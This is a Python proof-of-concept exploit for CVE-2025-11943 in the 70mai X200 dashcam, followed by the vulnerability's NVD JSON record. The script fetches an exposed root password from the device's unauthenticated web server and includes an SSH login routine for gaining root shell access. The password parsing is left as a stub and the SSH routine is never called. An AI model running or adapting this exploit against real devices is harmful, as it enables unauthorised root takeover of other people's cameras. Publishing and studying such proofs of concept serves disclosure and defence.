CVE-2025-11943

# CVE-2025-11943 PoC - 70mai X200 Default Credentials Exposure # Exploit for retrieving root password via unauthenticated HTTP server # Reference: https://github.com/geo-chen/70mai/blob/main/README.md#finding-10-exposed-root-password-via-unauthenticated-http-server import requests import sys def exploit(target_ip, port=80): """ Exploit CVE-2025-11943: Retrieve root password from 70mai X200 HTTP server Args: target_ip: IP address of the vulnerable 70mai X200 device port: HTTP server port (default: 80) """ url = f"http://{target_ip}:{port}/" # Send unauthenticated GET request to retrieve root credentials # The HTTP server exposes root password without authentication headers = { "User-Agent": "Mozilla/5.0", "Accept": "*/*" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: # Parse the response to extract root password # The server returns the root password in the response body print(f"[+] Target: {target_ip}:{port}") print(f"[+] Response received ({len(response.text)} bytes)") print(f"[+] Response content:\n{response.text}") # Extract password from response (implementation depends on response format) # Typically the password is embedded in JSON or HTML response return response.text else: print(f"[-] Unexpected status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return None def ssh_login(target_ip, username, password, port=22): """ Use extracted credentials to login via SSH """ import paramiko try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(target_ip, port=port, username=username, password=password, timeout=10) # Execute command to verify access stdin, stdout, stderr = client.exec_command('id') print(f"[+] SSH Login successful as {username}") print(f"[+] User info: {stdout.read().decode().strip()}") client.close() return True except Exception as e: print(f"[-] SSH Login failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") print(f"Example: {sys.argv[0]} 192.168.1.100") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 print(f"[*] CVE-2025-11943 - 70mai X200 Default Credentials Exploit") print(f"[*] Target: {target}:{port}") print("-" * 50) # Step 1: Retrieve root password via HTTP result = exploit(target, port) if result: print("\n[+] Exploit completed successfully") print("[!] Use the extracted credentials to gain root access")

{"cve": {"id": "CVE-2025-11943", "sourceIdentifier": "[email protected]", "published": "2025-10-19T20:15:36.083", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in 70mai X200 up to 20251010. Affected by this vulnerability is an unknown functionality of the component HTTP Web Server. The manipulation leads to use of default credentials. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1392"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:70mai:x200_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-10-10", "matchCriteriaId": "92AA7E65-AF30-4F7D-A1DC-89B1EE16146F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:70mai:x200:-:*:*:*:*:*:*:*", "matchCriteriaId": "F01430C4-0D39-4493-9CEA-7E44EFD0520B"}]}]}], "references": [{"url": "https://github.com/geo-chen/70mai/blob/main/README.md#finding-10-exposed-root-password-via-unauthenticated-http-server", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329022", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329022", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672521", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}